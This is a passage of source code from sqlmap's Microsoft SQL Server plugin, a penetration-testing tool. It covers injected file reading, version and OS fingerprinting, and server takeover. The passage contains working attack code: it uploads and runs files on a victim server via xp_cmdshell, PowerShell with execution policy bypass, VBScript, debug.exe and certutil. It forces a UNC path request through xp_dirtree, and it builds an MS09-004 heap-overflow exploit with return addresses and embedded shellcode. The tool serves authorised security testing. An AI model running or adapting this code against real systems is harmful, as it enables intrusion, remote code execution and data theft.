%s\" % strLineChar\n\n                lineAddr += len(strLineChar) // 2\n\n            fileLines.append(scrString)\n\n        fileLines.append(\"w\")\n        fileLines.append(\"q\")\n\n        return fileLines\n\n    def _updateDestChunk(self, fileContent, tmpPath):\n        randScr = \"tmpf%s.scr\" % randomStr(lowercase=True)\n        chunkName = randomStr(lowercase=True)\n        fileScrLines = self._dataToScr(fileContent, chunkName)\n\n        logger.debug(\"uploading debug script to %s\\\\%s, please wait..\" % (tmpPath, randScr))\n\n        self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)\n\n        logger.debug(\"generating chunk file %s\\\\%s from debug script %s\" % (tmpPath, chunkName, randScr))\n\n        commands = (\n            \"cd \\\"%s\\\"\" % tmpPath,\n            \"debug < %s\" % randScr,\n            \"del /F /Q %s\" % randScr\n        )\n\n        self.execCmd(\" & \".join(command for command in commands))\n\n        return chunkName\n\n    def stackedReadFile(self, remoteFile):\n        if not kb.bruteMode:\n            infoMsg = \"fetching file: '%s'\" % remoteFile\n            logger.info(infoMsg)\n\n        result = []\n        txtTbl = self.fileTblName\n        hexTbl = \"%s%shex\" % (self.fileTblName, randomStr())\n\n        self.createSupportTbl(txtTbl, self.tblField, \"text\")\n        inject.goStacked(\"DROP TABLE %s\" % hexTbl)\n        inject.goStacked(\"CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)\" % (hexTbl, self.tblField, \"VARCHAR(4096)\"))\n\n        logger.debug(\"loading the content of file '%s' into support table\" % remoteFile)\n        inject.goStacked(\"BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')\" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True)\n\n        # Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829\n        binToHexQuery = \"\"\"DECLARE @charset VARCHAR(16)\n        DECLARE @counter INT\n        DECLARE @hexstr VARCHAR(4096)\n        DECLARE @length INT\n        DECLARE @chunk INT\n\n        SET @charset = '0123456789ABCDEF'\n        SET @counter = 1\n        SET @hexstr = ''\n        SET @length = (SELECT DATALENGTH(%s) FROM %s)\n        SET @chunk = 1024\n\n        WHILE (@counter <= @length)\n        BEGIN\n            DECLARE @tempint INT\n            DECLARE @firstint INT\n            DECLARE @secondint INT\n\n            SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))\n            SET @firstint = floor(@tempint/16)\n            SET @secondint = @tempint - (@firstint * 16)\n            SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)\n\n            SET @counter = @counter + 1\n\n            IF @counter %% @chunk = 0\n            BEGIN\n                INSERT INTO %s(%s) VALUES(@hexstr)\n                SET @hexstr = ''\n            END\n        END\n\n        IF @counter %% (@chunk) != 0\n        BEGIN\n            INSERT INTO %s(%s) VALUES(@hexstr)\n        END\n        \"\"\" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)\n\n        binToHexQuery = binToHexQuery.replace(\"    \", \"\").replace(\"\\n\", \" \")\n        inject.goStacked(binToHexQuery)\n\n        if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):\n            result = inject.getValue(\"SELECT %s FROM %s ORDER BY id ASC\" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)\n\n        if not result:\n            result = []\n            count = inject.getValue(\"SELECT COUNT(*) FROM %s\" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n            if not isNumPosStrValue(count):\n                errMsg = \"unable to retrieve the content of the \"\n                errMsg += \"file '%s'\" % remoteFile\n                raise SqlmapNoneDataException(errMsg)\n\n            indexRange = getLimitRange(count)\n\n            for index in indexRange:\n                chunk = inject.getValue(\"SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC\" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)\n                result.append(chunk)\n\n        inject.goStacked(\"DROP TABLE %s\" % hexTbl)\n\n        return result\n\n    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        errMsg = \"Microsoft SQL Server does not support file upload with \"\n        errMsg += \"UNION query SQL injection technique\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):\n        infoMsg = \"using PowerShell to write the %s file content \" % fileType\n        infoMsg += \"to file '%s'\" % remoteFile\n        logger.info(infoMsg)\n\n        encodedFileContent = encodeBase64(localFileContent, binary=False)\n        encodedBase64File = \"tmpf%s.txt\" % randomStr(lowercase=True)\n        encodedBase64FilePath = \"%s\\\\%s\" % (tmpPath, encodedBase64File)\n\n        randPSScript = \"tmpps%s.ps1\" % randomStr(lowercase=True)\n        randPSScriptPath = \"%s\\\\%s\" % (tmpPath, randPSScript)\n\n        localFileSize = len(encodedFileContent)\n        chunkMaxSize = 1024\n\n        logger.debug(\"uploading the base64-encoded file to %s, please wait..\" % encodedBase64FilePath)\n\n        for i in xrange(0, localFileSize, chunkMaxSize):\n            wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]\n            self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)\n\n        psString = \"$Base64 = Get-Content -Path \\\"%s\\\"; \" % encodedBase64FilePath\n        psString += \"$Base64 = $Base64 -replace \\\"`t|`n|`r\\\",\\\"\\\"; $Content = \"\n        psString += \"[System.Convert]::FromBase64String($Base64); Set-Content \"\n        psString += \"-Path \\\"%s\\\" -Value $Content -Encoding Byte\" % remoteFile\n\n        logger.debug(\"uploading the PowerShell base64-decoding script to %s\" % randPSScriptPath)\n        self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)\n\n        logger.debug(\"executing the PowerShell base64-decoding script to write the %s file, please wait..\" % remoteFile)\n\n        commands = (\n            \"powershell -ExecutionPolicy ByPass -File \\\"%s\\\"\" % randPSScriptPath,\n            \"del /F /Q \\\"%s\\\"\" % encodedBase64FilePath,\n            \"del /F /Q \\\"%s\\\"\" % randPSScriptPath\n        )\n\n        self.execCmd(\" & \".join(command for command in commands))\n\n    def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):\n        infoMsg = \"using debug.exe to write the %s \" % fileType\n        infoMsg += \"file content to file '%s', please wait..\" % remoteFile\n        logger.info(infoMsg)\n\n        remoteFileName = ntpath.basename(remoteFile)\n        sFile = \"%s\\\\%s\" % (tmpPath, remoteFileName)\n        localFileSize = os.path.getsize(localFile)\n        debugSize = 0xFF00\n\n        if localFileSize < debugSize:\n            chunkName = self._updateDestChunk(localFileContent, tmpPath)\n\n            debugMsg = \"renaming chunk file %s\\\\%s to %s \" % (tmpPath, chunkName, fileType)\n            debugMsg += \"file %s\\\\%s and moving it to %s\" % (tmpPath, remoteFileName, remoteFile)\n            logger.debug(debugMsg)\n\n            commands = (\n                \"cd \\\"%s\\\"\" % tmpPath,\n                \"ren %s %s\" % (chunkName, remoteFileName),\n                \"move /Y %s %s\" % (remoteFileName, remoteFile)\n            )\n\n            self.execCmd(\" & \".join(command for command in commands))\n        else:\n            debugMsg = \"the file is larger than %d bytes. \" % debugSize\n            debugMsg += \"sqlmap will split it into chunks locally, upload \"\n            debugMsg += \"it chunk by chunk and recreate the original file \"\n            debugMsg += \"on the server, please wait..\"\n            logger.debug(debugMsg)\n\n            for i in xrange(0, localFileSize, debugSize):\n                localFileChunk = localFileContent[i:i + debugSize]\n                chunkName = self._updateDestChunk(localFileChunk, tmpPath)\n\n                if i == 0:\n                    debugMsg = \"renaming chunk \"\n                    copyCmd = \"ren %s %s\" % (chunkName, remoteFileName)\n                else:\n                    debugMsg = \"appending chunk \"\n                    copyCmd = \"copy /B /Y %s+%s %s\" % (remoteFileName, chunkName, remoteFileName)\n\n                debugMsg += \"%s\\\\%s to %s file %s\\\\%s\" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)\n                logger.debug(debugMsg)\n\n                commands = (\n                    \"cd \\\"%s\\\"\" % tmpPath,\n                    copyCmd,\n                    \"del /F /Q %s\" % chunkName\n                )\n\n                self.execCmd(\" & \".join(command for command in commands))\n\n            logger.debug(\"moving %s file %s to %s\" % (fileType, sFile, remoteFile))\n\n            commands = (\n                \"cd \\\"%s\\\"\" % tmpPath,\n                \"move /Y %s %s\" % (remoteFileName, remoteFile)\n            )\n\n            self.execCmd(\" & \".join(command for command in commands))\n\n    def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):\n        infoMsg = \"using a custom visual basic script to write the \"\n        infoMsg += \"%s file content to file '%s', please wait..\" % (fileType, remoteFile)\n        logger.info(infoMsg)\n\n        randVbs = \"tmps%s.vbs\" % randomStr(lowercase=True)\n        randFile = \"tmpf%s.txt\" % randomStr(lowercase=True)\n        randFilePath = \"%s\\\\%s\" % (tmpPath, randFile)\n\n        vbs = \"\"\"Dim inputFilePath, outputFilePath\n        inputFilePath = \"%s\"\n        outputFilePath = \"%s\"\n        Set fs = CreateObject(\"Scripting.FileSystemObject\")\n        Set file = fs.GetFile(inputFilePath)\n        If file.Size Then\n            Wscript.Echo \"Loading from: \" & inputFilePath\n            Wscript.Echo\n            Set fd = fs.OpenTextFile(inputFilePath, 1)\n            data = fd.ReadAll\n            fd.Close\n            data = Replace(data, \" \", \"\")\n            data = Replace(data, vbCr, \"\")\n            data = Replace(data, vbLf, \"\")\n            Wscript.Echo \"Fixed Input: \"\n            Wscript.Echo data\n            Wscript.Echo\n            decodedData = base64_decode(data)\n            Wscript.Echo \"Output: \"\n            Wscript.Echo decodedData\n            Wscript.Echo\n            Wscript.Echo \"Writing output in: \" & outputFilePath\n            Wscript.Echo\n            Set ofs = CreateObject(\"Scripting.FileSystemObject\").OpenTextFile(outputFilePath, 2, True)\n            ofs.Write decodedData\n            ofs.close\n        Else\n            Wscript.Echo \"The file is empty.\"\n        End If\n        Function base64_decode(byVal strIn)\n            Dim w1, w2, w3, w4, n, strOut\n            For n = 1 To Len(strIn) Step 4\n                w1 = mimedecode(Mid(strIn, n, 1))\n                w2 = mimedecode(Mid(strIn, n + 1, 1))\n                w3 = mimedecode(Mid(strIn, n + 2, 1))\n                w4 = mimedecode(Mid(strIn, n + 3, 1))\n                If Not w2 Then _\n                strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))\n                If  Not w3 Then _\n                strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))\n                If Not w4 Then _\n                strOut = strOut + Chr(((w3 * 64 + w4) And 255))\n            Next\n            base64_decode = strOut\n            End Function\n        Function mimedecode(byVal strIn)\n            Base64Chars = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\n            If Len(strIn) = 0 Then\n                mimedecode = -1 : Exit Function\n            Else\n                mimedecode = InStr(Base64Chars, strIn) - 1\n            End If\n        End Function\"\"\" % (randFilePath, remoteFile)\n\n        vbs = vbs.replace(\"    \", \"\")\n        encodedFileContent = encodeBase64(localFileContent, binary=False)\n\n        logger.debug(\"uploading the file base64-encoded content to %s, please wait..\" % randFilePath)\n\n        self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)\n\n        logger.debug(\"uploading a visual basic decoder stub %s\\\\%s, please wait..\" % (tmpPath, randVbs))\n\n        self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)\n\n        commands = (\n            \"cd \\\"%s\\\"\" % tmpPath,\n            \"cscript //nologo %s\" % randVbs,\n            \"del /F /Q %s\" % randVbs,\n            \"del /F /Q %s\" % randFile\n        )\n\n        self.execCmd(\" & \".join(command for command in commands))\n\n    def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):\n        infoMsg = \"using certutil.exe to write the %s \" % fileType\n        infoMsg += \"file content to file '%s', please wait..\" % remoteFile\n        logger.info(infoMsg)\n\n        chunkMaxSize = 500\n\n        randFile = \"tmpf%s.txt\" % randomStr(lowercase=True)\n        randFilePath = \"%s\\\\%s\" % (tmpPath, randFile)\n\n        encodedFileContent = encodeBase64(localFileContent, binary=False)\n\n        splittedEncodedFileContent = '\\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])\n\n        logger.debug(\"uploading the file base64-encoded content to %s, please wait..\" % randFilePath)\n\n        self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)\n\n        logger.debug(\"decoding the file to %s..\" % remoteFile)\n\n        commands = (\n            \"cd \\\"%s\\\"\" % tmpPath,\n            \"certutil -f -decode %s %s\" % (randFile, remoteFile),\n            \"del /F /Q %s\" % randFile\n        )\n\n        self.execCmd(\" & \".join(command for command in commands))\n\n    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        # NOTE: this is needed here because we use xp_cmdshell extended\n        # procedure to write a file on the back-end Microsoft SQL Server\n        # file system\n        self.initEnv()\n        self.getRemoteTempPath()\n\n        tmpPath = posixToNtSlashes(conf.tmpPath)\n        remoteFile = posixToNtSlashes(remoteFile)\n\n        checkFile(localFile)\n        localFileContent = open(localFile, \"rb\").read()\n\n        self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType)\n        written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n\n        if written is False:\n            message = \"do you want to try to upload the file with \"\n            message += \"the custom Visual Basic script technique? [Y/n] \"\n\n            if readInput(message, default='Y', boolean=True):\n                self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)\n                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n\n        if written is False:\n            message = \"do you want to try to upload the file with \"\n            message += \"the built-in debug.exe technique? [Y/n] \"\n\n            if readInput(message, default='Y', boolean=True):\n                self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)\n                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n\n        if written is False:\n            message = \"do you want to try to upload the file with \"\n            message += \"the built-in certutil.exe technique? [Y/n] \"\n\n            if readInput(message, default='Y', boolean=True):\n                self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)\n                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n\n        return written\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mssqlserver/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import OS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import MSSQL_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.MSSQL)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n        actVer = Format.getDbms()\n\n        if not conf.extensiveFp:\n            value += actVer\n            return value\n\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            release = kb.bannerFp.get(\"dbmsRelease\")\n            version = kb.bannerFp.get(\"dbmsVersion\")\n            servicepack = kb.bannerFp.get(\"dbmsServicePack\")\n\n            if release and version and servicepack:\n                banVer = \"%s %s \" % (DBMS.MSSQL, release)\n                banVer += \"Service Pack %s \" % servicepack\n                banVer += \"version %s\" % version\n\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES):\n            setDbms(\"%s %s\" % (DBMS.MSSQL, Backend.getVersion()))\n\n            self.getBanner()\n\n            Backend.setOs(OS.WINDOWS)\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.MSSQL\n        logger.info(infoMsg)\n\n        # NOTE: SELECT LEN(@@VERSION)=LEN(@@VERSION) FROM DUAL does not\n        # work connecting directly to the Microsoft SQL Server database\n        if conf.direct:\n            result = True\n        else:\n            result = inject.checkBooleanExpression(\"UNICODE(SQUARE(NULL)) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.MSSQL\n            logger.info(infoMsg)\n\n            for version, check in (\n                (\"2019\", \"CHARINDEX('15.0.',@@VERSION)>0\"),\n                (\"Azure\", \"@@VERSION LIKE '%Azure%'\"),\n                (\"2017\", \"TRIM(NULL) IS NULL\"),\n                (\"2016\", \"ISJSON(NULL) IS NULL\"),\n                (\"2014\", \"CHARINDEX('12.0.',@@VERSION)>0\"),\n                (\"2012\", \"CONCAT(NULL,NULL)=CONCAT(NULL,NULL)\"),\n                (\"2008\", \"SYSDATETIME()=SYSDATETIME()\"),\n                (\"2005\", \"XACT_STATE()=XACT_STATE()\"),\n                (\"2000\", \"HOST_NAME()=HOST_NAME()\"),\n            ):\n                result = inject.checkBooleanExpression(check)\n\n                if result:\n                    Backend.setVersion(version)\n                    break\n\n            if Backend.getVersion():\n                setDbms(\"%s %s\" % (DBMS.MSSQL, Backend.getVersion()))\n            else:\n                setDbms(DBMS.MSSQL)\n\n            self.getBanner()\n\n            Backend.setOs(OS.WINDOWS)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.MSSQL\n            logger.warning(warnMsg)\n\n            return False\n\n    def checkDbmsOs(self, detailed=False):\n        if Backend.getOs() and Backend.getOsVersion() and Backend.getOsServicePack():\n            return\n\n        if not Backend.getOs():\n            Backend.setOs(OS.WINDOWS)\n\n        if not detailed:\n            return\n\n        infoMsg = \"fingerprinting the back-end DBMS operating system \"\n        infoMsg += \"version and service pack\"\n        logger.info(infoMsg)\n\n        infoMsg = \"the back-end DBMS operating system is %s\" % Backend.getOs()\n\n        self.createSupportTbl(self.fileTblName, self.tblField, \"varchar(1000)\")\n        inject.goStacked(\"INSERT INTO %s(%s) VALUES (%s)\" % (self.fileTblName, self.tblField, \"@@VERSION\"))\n\n        # Reference: https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions\n        # https://en.wikipedia.org/wiki/Windows_NT#Releases\n        versions = {\n            \"NT\": (\"4.0\", (6, 5, 4, 3, 2, 1)),\n            \"2000\": (\"5.0\", (4, 3, 2, 1)),\n            \"XP\": (\"5.1\", (3, 2, 1)),\n            \"2003\": (\"5.2\", (2, 1)),\n            \"Vista or 2008\": (\"6.0\", (2, 1)),\n            \"7 or 2008 R2\": (\"6.1\", (1, 0)),\n            \"8 or 2012\": (\"6.2\", (0,)),\n            \"8.1 or 2012 R2\": (\"6.3\", (0,)),\n            \"10 or 2016 or 2019\": (\"10.0\", (0,))\n        }\n\n        # Get back-end DBMS underlying operating system version\n        for version, data in versions.items():\n            query = \"EXISTS(SELECT %s FROM %s WHERE %s \" % (self.tblField, self.fileTblName, self.tblField)\n            query += \"LIKE '%Windows NT \" + data[0] + \"%')\"\n            result = inject.checkBooleanExpression(query)\n\n            if result:\n                Backend.setOsVersion(version)\n                infoMsg += \" %s\" % Backend.getOsVersion()\n                break\n\n        if not Backend.getOsVersion():\n            Backend.setOsVersion(\"2003\")\n            Backend.setOsServicePack(2)\n\n            warnMsg = \"unable to fingerprint the underlying operating \"\n            warnMsg += \"system version, assuming it is Windows \"\n            warnMsg += \"%s Service Pack %d\" % (Backend.getOsVersion(), Backend.getOsServicePack())\n            logger.warning(warnMsg)\n\n            self.cleanup(onlyFileTbl=True)\n\n            return\n\n        # Get back-end DBMS underlying operating system service pack\n        sps = versions[Backend.getOsVersion()][1]\n        for sp in sps:\n            query = \"EXISTS(SELECT %s FROM %s WHERE %s \" % (self.tblField, self.fileTblName, self.tblField)\n            query += \"LIKE '%Service Pack \" + getUnicode(sp) + \"%')\"\n            result = inject.checkBooleanExpression(query)\n\n            if result:\n                Backend.setOsServicePack(sp)\n                break\n\n        if not Backend.getOsServicePack():\n            debugMsg = \"assuming the operating system has no service pack\"\n            logger.debug(debugMsg)\n\n            Backend.setOsServicePack(0)\n\n        if Backend.getOsVersion():\n            infoMsg += \" Service Pack %d\" % Backend.getOsServicePack()\n\n        logger.info(infoMsg)\n\n        self.cleanup(onlyFileTbl=True)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mssqlserver/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar\"\n        True\n        >>> Syntax.escape(u\"SELECT 'abcd\\xebfgh' FROM foobar\") == \"SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+NCHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"+\".join(\"%s(%d)\" % (\"CHAR\" if _ < 128 else \"NCHAR\", _) for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mssqlserver/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport binascii\n\nfrom lib.core.common import Backend\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getBytes\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.request import inject\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def __init__(self):\n        self.spExploit = \"\"\n\n        GenericTakeover.__init__(self)\n\n    def uncPathRequest(self):\n        # inject.goStacked(\"EXEC master..xp_fileexist '%s'\" % self.uncPath, silent=True)\n        inject.goStacked(\"EXEC master..xp_dirtree '%s'\" % self.uncPath)\n\n    def spHeapOverflow(self):\n        \"\"\"\n        References:\n        * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004\n        * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co\n        \"\"\"\n\n        returns = {\n            # 2003 Service Pack 0\n            \"2003-0\": (\"\"),\n\n            # 2003 Service Pack 1\n            \"2003-1\": (\"CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)\", \"CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)\", \"CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)\", \"CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)\", \"CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)\", \"CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)\"),\n\n            # 2003 Service Pack 2 updated at 12/2008\n            # \"2003-2\": (\"CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)\", \"CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)\", \"CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)\", \"CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)\", \"CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)\", \"CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)\"),\n\n            # 2003 Service Pack 2 updated at 05/2009\n            \"2003-2\": (\"CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)\", \"CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)\", \"CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)\", \"CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)\", \"CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)\", \"CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)\"),\n\n            # 2003 Service Pack 2 updated at 09/2009\n            # \"2003-2\": (\"CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)\", \"CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)\", \"CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)\", \"CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)\", \"CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)\", \"CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)\", \"CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)\"),\n        }\n\n        addrs = None\n\n        for versionSp, data in returns.items():\n            version, sp = versionSp.split(\"-\")\n            sp = int(sp)\n\n            if Backend.getOsVersion() == version and Backend.getOsServicePack() == sp:\n                addrs = data\n\n                break\n\n        if not addrs:\n            errMsg = \"sqlmap can not exploit the stored procedure buffer \"\n            errMsg += \"overflow because it does not have a valid return \"\n            errMsg += \"code for the underlying operating system (Windows \"\n            errMsg += \"%s Service Pack %d)\" % (Backend.getOsVersion(), Backend.getOsServicePack())\n            raise SqlmapUnsupportedFeatureException(errMsg)\n\n        shellcodeChar = \"\"\n        hexStr = binascii.hexlify(getBytes(self.shellcodeString[:-1]))\n\n        for hexPair in xrange(0, len(hexStr), 2):\n            shellcodeChar += \"CHAR(0x%s)+\" % hexStr[hexPair:hexPair + 2]\n\n        shellcodeChar = shellcodeChar[:-1]\n\n        self.spExploit = \"\"\"DECLARE @buf NVARCHAR(4000),\n        @val NVARCHAR(4),\n        @counter INT\n        SET @buf = '\n        DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int\n        EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,'''\n        SET @val = CHAR(0x41)\n        SET @counter = 0\n        WHILE @counter < 3320\n        BEGIN\n          SET @counter = @counter + 1\n          IF @counter = 411\n          BEGIN\n            /* pointer to call [ecx+8] */\n            SET @buf = @buf + %s\n\n            /* push ebp, pop esp, ret 4 */\n            SET @buf = @buf + %s\n\n            /* push ecx, pop esp, pop ebp, retn 8 */\n            SET @buf = @buf + %s\n\n            /* Garbage */\n            SET @buf = @buf + CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)\n\n            /* retn 1c */\n            SET @buf = @buf + %s\n\n            /* retn 1c */\n            SET @buf = @buf + %s\n\n            /* anti DEP */\n            SET @buf = @buf + %s\n\n            /* jmp esp */\n            SET @buf = @buf + %s\n\n            /* jmp esp */\n            SET @buf = @buf + %s\n\n            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)\n            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)\n            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)\n            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)\n            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)\n            SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90)\n\n            set @buf = @buf + CHAR(0x64)+CHAR(0x8B)+CHAR(0x25)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)\n            set @buf = @buf + CHAR(0x8B)+CHAR(0xEC)\n            set @buf = @buf + CHAR(0x83)+CHAR(0xEC)+CHAR(0x20)\n\n            /* Metasploit shellcode */\n            SET @buf = @buf + %s\n\n            SET @buf = @buf + 